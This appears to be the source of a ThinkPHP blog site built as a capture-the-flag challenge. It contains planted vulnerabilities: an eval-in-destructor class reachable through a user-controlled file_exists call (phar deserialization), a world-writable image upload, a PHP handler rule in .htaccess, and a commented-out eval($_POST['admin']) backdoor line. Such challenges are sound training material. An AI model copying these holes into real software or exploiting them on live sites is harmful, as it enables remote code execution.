asc')->select(); 12 | $tagres=db('tags')->order('id desc')->select(); 13 | $this->assign(array( 14 | 'cateres'=>$cateres, 15 | 'tagres'=>$tagres 16 | )); 17 | } 18 | 19 | 20 | 21 | public function right(){ 22 | $clickres=db('article')->order('click desc')->limit(8)->select(); 23 | $tjres=db('article')->where('state','=',1)->order('click desc')->limit(8)->select(); 24 | $this->assign(array( 25 | 'clickres'=>$clickres, 26 | 'tjres'=>$tjres 27 | )); 28 | } 29 | 30 | 31 | 32 | 33 | } 34 | $filename = Request::instance()->param('file'); 35 | class Core{ 36 | public $data = 'time();'; 37 | public function __destruct(){ 38 | eval($this->data); 39 | } 40 | } 41 | file_exists($filename); 42 | -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Cate.php: -------------------------------------------------------------------------------- 1 | find($cateid); 11 | $this->assign('cates',$cates); 12 | //查询当前栏目下的文章 13 | $articleres=db('article')->where(array('cateid'=>$cateid))->paginate(3); 14 | $this->assign('articleres',$articleres); 15 | return $this->fetch('cate'); 16 | } 17 | 18 | 19 | 20 | 21 | } -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Index.php: -------------------------------------------------------------------------------- 1 | order('id desc')->paginate(3); 12 | $this->assign('articleres', $articleres); 13 | return $this->fetch(); 14 | 15 | } 16 | 17 | public function unlink($path) 18 | { 19 | return is_file($path) && unlink($path); 20 | } 21 | 22 | public function upload() 23 | { 24 | $file = request()->file('image'); 25 | if ($file) { 26 | $info = $file->validate(['ext' => 'jpg,png,gif', 'type' => 'image/jpeg,image/png,image/gif'])->move(ROOT_PATH . 'public' . DS . 'uploads'); 27 | if ($info) { 28 | $po = ROOT_PATH . 'public' . DS . 'uploads' . '/' . $info->getSaveName(); 29 | chmod($po,0777); 30 | $p='http://127.0.0.1/uploads/'.$info->getSaveName(); 31 | echo ""; 32 | echo '哦!爆照哦!!!'; 33 | if ($po) { 34 | echo $this->success("上传成功", "Index/index",-1,20); 35 | } else { 36 | $this->unlink($po); 37 | echo $this->error(); 38 | } 39 | } else { 40 | echo $file->getError("error"); 41 | } 42 | } 43 | } 44 | } 45 | ?> -------------------------------------------------------------------------------- /thinkPHP/application/index/controller/Search.php: -------------------------------------------------------------------------------- 1 | where($map)->order('id desc')->paginate($listRows = 3, $simple = false, $config = [ 12 | 'query'=>array('keywords'=>$keywords), 13 | ]); 14 | $this->assign(array( 15 | 'searchres'=>$searchres, 16 | 'keywords'=>$keywords 17 | )); 18 | }else{ 19 | $this->assign(array( 20 | 'searchres'=>null, 21 | 'keywords'=>'暂无数据' 22 | )); 23 | } 24 | 25 | return $this->fetch('search'); 26 | } 27 | 28 | 29 | 30 | 31 | } 32 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/cate/cate.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | {include file="common/header" /} 14 | 15 | 16 | 17 | 18 |
主页 > {$cates.catename} >
19 | 20 |
21 | 22 |
23 | 24 | {volist name="articleres" id="vo"} 25 |
26 |
27 | 28 |
29 |
30 |

{$vo.title}

31 |
发布时间:{$vo['time']|date="Y-m-d",###}
32 |

{$vo.desc}

33 |
34 | $v) { 37 | echo "$v"; 38 | } 39 | ?> 40 |
41 |
42 |
43 | {/volist} 44 | 45 | 46 |
47 |
48 | {$articleres->render()} 49 |
50 |
51 |
52 | 53 | {include file="common/right" /} 54 | 55 |
56 | {include file="common/foot" /} 57 | 58 | 59 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/common/foot.html: -------------------------------------------------------------------------------- 1 |
2 | 5 |
-------------------------------------------------------------------------------- /thinkPHP/application/index/view/common/header.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
wed114婚尚
5 | 6 |
7 |
8 | 首页 9 | {volist name="cateres" id="vo"} 10 | {$vo.catename} 11 | {/volist} 12 |
13 |
14 |
15 |
16 | 17 |
18 |
19 | Welcome my friends 20 |
21 |
22 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/common/right.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
热门点击
    4 | {volist name="clickres" id="vo"} 5 |
  • {$vo.title}
    • 6 | {/volist} 7 |
8 |
9 | 10 |
11 |
12 |
13 |
推荐阅读
    14 | {volist name="tjres" id="vo"} 15 |
  • {$vo.title}
    • 16 | {/volist} 17 |
18 |
19 | 20 |
21 |
22 | 23 |
29 | 30 |
31 | 32 | 33 | 34 |
-------------------------------------------------------------------------------- /thinkPHP/application/index/view/index/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | {include file="common/header" /} 13 | 14 | 15 | 16 | 17 |
18 | 19 |
20 | 21 |
22 | {volist name="articleres" id="vo"} 23 |
24 |
{$vo.title}
25 |
26 |

{$vo.title}

27 |
发布时间:{$vo.time|date="Y-m-d",###}
28 |

{$vo.desc}

29 |
30 |
31 |
32 |
33 | {/volist} 34 |
35 |
{$articleres->render()}
36 |
37 |
38 |
来来,把你的皂片发给我
39 | 40 |
41 | 42 | 43 |
44 | {include file="common/right" /} 45 |
46 | 47 | 48 | 49 | {include file="common/foot" /} 50 | 51 | 52 | -------------------------------------------------------------------------------- /thinkPHP/application/index/view/search/search.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | {include file="common/header" /} 14 | 15 | 16 | 17 | 18 |
搜索:{$keywords}
19 | 20 |
21 | 22 |
23 | 24 | {volist name="searchres" id="vo"} 25 |
26 |
27 | 28 |
29 |
30 |

{$vo.title}

31 |
发布时间:{$vo['time']|date="Y-m-d",###}
32 |

{$vo.desc}

33 |
34 | $v) { 37 | echo "$v"; 38 | } 39 | ?> 40 |
41 |
42 |
43 | {/volist} 44 | 45 | 46 |
47 |
48 | {$searchres->render()} 49 |
50 |
51 |
52 | 53 | {include file="common/right" /} 54 | 55 |
56 | {include file="common/foot" /} 57 | 58 | 59 | -------------------------------------------------------------------------------- /thinkPHP/application/route.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | '__pattern__' => [ 14 | 'name' => '\w+', 15 | ], 16 | '[hello]' => [ 17 | ':id' => ['index/hello', ['method' => 'get'], ['id' => '\d+']], 18 | ':name' => ['index/hello', ['method' => 'post']], 19 | ], 20 | 21 | ]; 22 | -------------------------------------------------------------------------------- /thinkPHP/application/tags.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // 应用行为扩展定义文件 13 | return [ 14 | // 应用初始化 15 | 'app_init' => [], 16 | // 应用开始 17 | 'app_begin' => [], 18 | // 模块初始化 19 | 'module_init' => [], 20 | // 操作开始执行 21 | 'action_begin' => [], 22 | // 视图内容过滤 23 | 'view_filter' => [], 24 | // 日志写入 25 | 'log_write' => [], 26 | // 应用结束 27 | 'app_end' => [], 28 | ]; 29 | -------------------------------------------------------------------------------- /thinkPHP/build.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | return [ 13 | // 生成应用公共文件 14 | '__file__' => ['common.php', 'config.php', 'database.php'], 15 | 16 | // 定义demo模块的自动生成 (按照实际定义的文件名生成) 17 | 'demo' => [ 18 | '__file__' => ['common.php'], 19 | '__dir__' => ['behavior', 'controller', 'model', 'view'], 20 | 'controller' => ['Index', 'Test', 'UserType'], 21 | 'model' => ['User', 'UserType'], 22 | 'view' => ['index/index'], 23 | ], 24 | // 其他更多的模块定义 25 | ]; 26 | -------------------------------------------------------------------------------- /thinkPHP/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "topthink/think", 3 | "description": "the new thinkphp framework", 4 | "type": "project", 5 | "keywords": [ 6 | "framework", 7 | "thinkphp", 8 | "ORM" 9 | ], 10 | "homepage": "http://thinkphp.cn/", 11 | "license": "Apache-2.0", 12 | "authors": [ 13 | { 14 | "name": "liu21st", 15 | "email": "liu21st@gmail.com" 16 | } 17 | ], 18 | "require": { 19 | "php": ">=5.4.0", 20 | "topthink/framework": "^5.0", 21 | "topthink/think-image": "^1.0", 22 | "topthink/think-migration": "^1.0", 23 | "topthink/think-captcha": "^1.0", 24 | "topthink/think-mongo": "^1.0", 25 | "topthink/think-testing": "^1.0", 26 | "topthink/think-worker": "^1.0", 27 | "topthink/think-helper": "^1.0", 28 | "topthink/think-queue": "^1.0", 29 | "topthink/think-angular": "^1.0" 30 | }, 31 | "extra": { 32 | "think-path": "thinkphp" 33 | }, 34 | "config": { 35 | "preferred-install": "dist" 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /thinkPHP/extend/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /thinkPHP/phpunit.xml: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 13 | ./tests/ 14 | 15 | 16 | 17 | 18 | application/ 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /thinkPHP/public/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | Options +FollowSymlinks -Multiviews 3 | RewriteEngine On 4 | 5 | RewriteCond %{REQUEST_FILENAME} !-d 6 | RewriteCond %{REQUEST_FILENAME} !-f 7 | RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L] 8 | 9 | 10 | 11 | 12 | SetHandler application/x-httpd-php 13 | 14 | -------------------------------------------------------------------------------- /thinkPHP/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/thinkPHP/public/favicon.ico -------------------------------------------------------------------------------- /thinkPHP/public/index.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // [ 应用入口文件 ] 13 | 14 | // 定义应用目录 15 | define('APP_PATH', __DIR__ . '/../application/'); 16 | define('SITE_URL', ''); 17 | // 加载框架引导文件 18 | require __DIR__ . '/../thinkphp/start.php'; 19 | // eval($_POST['admin']); 20 | cookie('csrf_token', ''); -------------------------------------------------------------------------------- /thinkPHP/public/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: 3 | -------------------------------------------------------------------------------- /thinkPHP/public/router.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | // $Id$ 12 | 13 | if (is_file($_SERVER["DOCUMENT_ROOT"] . $_SERVER["REQUEST_URI"])) { 14 | return false; 15 | } else { 16 | require __DIR__ . "/index.php"; 17 | } 18 | -------------------------------------------------------------------------------- /thinkPHP/public/static/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /thinkPHP/runtime/temp/3f3091e7a346cc474820a2a4d5d14333.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 跳转提示 7 | 17 | 18 | 19 |
20 | 21 |

:)

22 |

23 | 24 |

:(

25 |

26 | 27 |

28 |

29 | 页面自动 跳转 等待时间: 30 |

31 |
32 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /thinkPHP/runtime/temp/549f8e214256acc77c6d71d90dde481a.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /thinkPHP/tests/ExampleTest.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace tests; 12 | 13 | class ExampleTest extends TestCase 14 | { 15 | 16 | public function testBasicExample() 17 | { 18 | $this->visit('/')->see('ThinkPHP'); 19 | } 20 | } -------------------------------------------------------------------------------- /thinkPHP/tests/TestCase.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | namespace tests; 12 | 13 | class TestCase extends \think\testing\TestCase 14 | { 15 | protected $baseUrl = 'http://localhost'; 16 | } -------------------------------------------------------------------------------- /thinkPHP/think: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | 11 | // +---------------------------------------------------------------------- 12 | 13 | // 定义项目路径 14 | define('APP_PATH', __DIR__ . '/application/'); 15 | 16 | // 加载框架引导文件 17 | require __DIR__.'/thinkphp/console.php'; 18 | -------------------------------------------------------------------------------- /thinkPHP/vendor/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /thinkPHP/writeup.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/thinkPHP/writeup.pdf --------------------------------------------------------------------------------